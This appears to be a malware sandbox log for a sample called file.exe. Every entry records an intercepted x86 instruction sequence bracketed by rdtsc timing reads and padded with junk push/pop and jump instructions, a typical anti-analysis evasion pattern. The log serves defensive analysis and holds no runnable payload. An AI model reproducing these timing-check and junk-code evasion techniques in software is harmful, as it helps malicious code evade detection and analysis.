Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4667 second address: 4C4678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4AAE second address: 4C4AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4C0D second address: 4C4C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503B second address: 4C5041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5041 second address: 4C5046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C517E second address: 4C518F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC10C second address: 4CC144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F86A1919476h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jbe 00007F86A191947Eh 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F86A1919487h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CBB54 second address: 4CBB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D78C4 second address: 4D78CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D78CE second address: 4D78D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC860 second address: 4DC865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC865 second address: 4DC88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F86A0EA80F6h 0x0000000a jmp 00007F86A0EA8100h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F86A0EA80F6h 0x00000018 jng 00007F86A0EA80F6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC88E second address: 4DC894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC894 second address: 4DC8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F86A0EA8101h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F86A0EA8102h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC8C7 second address: 4DC8E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919485h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E8622 second address: 4E8626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB762 second address: 4EB768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F270E second address: 4F2712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2712 second address: 4F2716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F2716 second address: 4F273F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F86A0EA80FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F86A0EA80FFh 0x00000012 js 00007F86A0EA80F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F273F second address: 4F2743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8CFE second address: 4F8D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8E5F second address: 4F8E76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919483h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8E76 second address: 4F8E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F86A0EA8102h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9016 second address: 4F9034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F86A1919486h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEA0F second address: 4FEA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEA14 second address: 4FEA35 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F86A1919488h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEA35 second address: 4FEA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEA42 second address: 4FEA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F86A1919476h 0x0000000d jbe 00007F86A1919476h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FEA55 second address: 4FEA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE58E second address: 4FE595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE595 second address: 4FE5C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F86A0EA80F8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnl 00007F86A0EA80F8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 push edx 0x0000001a jmp 00007F86A0EA80FEh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE70C second address: 4FE751 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F86A1919476h 0x00000008 jmp 00007F86A191947Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jl 00007F86A1919476h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c js 00007F86A191947Eh 0x00000022 pushad 0x00000023 popad 0x00000024 ja 00007F86A1919476h 0x0000002a jmp 00007F86A1919481h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE751 second address: 4FE767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A0EA8100h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE767 second address: 4FE76B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519BB3 second address: 519BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F86A0EA80FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519BC4 second address: 519BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51BCB7 second address: 51BCCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F86A0EA80F6h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534868 second address: 53486F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53486F second address: 534886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F86A0EA80FCh 0x00000008 jnp 00007F86A0EA80F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534886 second address: 5348A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F86A191947Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534B66 second address: 534B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F86A0EA80F8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534B79 second address: 534B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E1E second address: 534E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E29 second address: 534E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E2F second address: 534E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534E35 second address: 534E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535100 second address: 535105 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535105 second address: 535110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537F72 second address: 537F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537F76 second address: 537F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F86A191947Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537F84 second address: 537F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5382FE second address: 538302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538302 second address: 538308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538308 second address: 538312 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F86A191947Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53869C second address: 5386A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5386A1 second address: 5386AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F86A1919476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E9029E second address: 4E902AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A0EA80FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E902AD second address: 4E902B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E902B1 second address: 4E902CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F86A0EA8100h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90326 second address: 4E9032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E9032A second address: 4E90347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90347 second address: 4E9034D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E9034D second address: 4E90351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC041B second address: 4EC041F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC041F second address: 4EC0425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0425 second address: 4EC0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F86A1919482h 0x00000008 pop esi 0x00000009 call 00007F86A191947Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 pop ecx 0x00000016 jmp 00007F86A1919487h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F86A1919486h 0x00000022 mov ebp, esp 0x00000024 jmp 00007F86A1919480h 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0495 second address: 4EC049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC049C second address: 4EC04B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A1919485h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC04B5 second address: 4EC053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F86A0EA80FAh 0x00000010 and ah, 00000048h 0x00000013 jmp 00007F86A0EA80FBh 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F86A0EA8108h 0x0000001f sbb ax, 17A8h 0x00000024 jmp 00007F86A0EA80FBh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ecx 0x0000002c jmp 00007F86A0EA8106h 0x00000031 xchg eax, esi 0x00000032 jmp 00007F86A0EA8100h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F86A0EA80FEh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC053D second address: 4EC0543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0543 second address: 4EC0547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0547 second address: 4EC054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC054B second address: 4EC055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC055A second address: 4EC058B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c jmp 00007F86A1919489h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov si, bx 0x00000018 mov di, DC1Ah 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC058B second address: 4EC05A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F86A0EA80FBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC05A4 second address: 4EC05AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC05AA second address: 4EC05E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F86A0EA8107h 0x0000000e push dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F86A0EA8100h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC05E1 second address: 4EC05E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC065D second address: 4EC066C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC06DB second address: 4EC06FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC06FF second address: 4EB0059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F86A0EA80F7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F86A5AE1533h 0x00000032 mov edi, edi 0x00000034 jmp 00007F86A0EA8107h 0x00000039 xchg eax, ebp 0x0000003a jmp 00007F86A0EA8106h 0x0000003f push eax 0x00000040 jmp 00007F86A0EA80FBh 0x00000045 xchg eax, ebp 0x00000046 pushad 0x00000047 mov dx, ax 0x0000004a jmp 00007F86A0EA8100h 0x0000004f popad 0x00000050 mov ebp, esp 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0059 second address: 4EB00D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 42F6651Fh 0x0000000b popad 0x0000000c push FFFFFFFEh 0x0000000e jmp 00007F86A1919482h 0x00000013 call 00007F86A1919479h 0x00000018 jmp 00007F86A1919480h 0x0000001d push eax 0x0000001e jmp 00007F86A191947Bh 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 pushad 0x00000028 pushad 0x00000029 mov cl, dl 0x0000002b mov ax, E63Dh 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007F86A191947Ah 0x00000036 and eax, 7FE92C18h 0x0000003c jmp 00007F86A191947Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov eax, dword ptr [eax] 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov bl, ah 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB00D3 second address: 4EB011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 call 00007F86A0EA80FDh 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 popad 0x0000001a pop eax 0x0000001b jmp 00007F86A0EA80FDh 0x00000020 push 5733DF3Fh 0x00000025 pushad 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 add dword ptr [esp], 1F614C31h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB011E second address: 4EB0135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0135 second address: 4EB013D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB013D second address: 4EB01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr fs:[00000000h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F86A191947Dh 0x00000014 xor cx, 41D6h 0x00000019 jmp 00007F86A1919481h 0x0000001e popfd 0x0000001f jmp 00007F86A1919480h 0x00000024 popad 0x00000025 nop 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F86A191947Eh 0x0000002d sbb ax, 7728h 0x00000032 jmp 00007F86A191947Bh 0x00000037 popfd 0x00000038 mov ch, 74h 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007F86A1919482h 0x00000041 nop 0x00000042 pushad 0x00000043 jmp 00007F86A191947Eh 0x00000048 push eax 0x00000049 push edx 0x0000004a call 00007F86A1919480h 0x0000004f pop esi 0x00000050 rdtsc
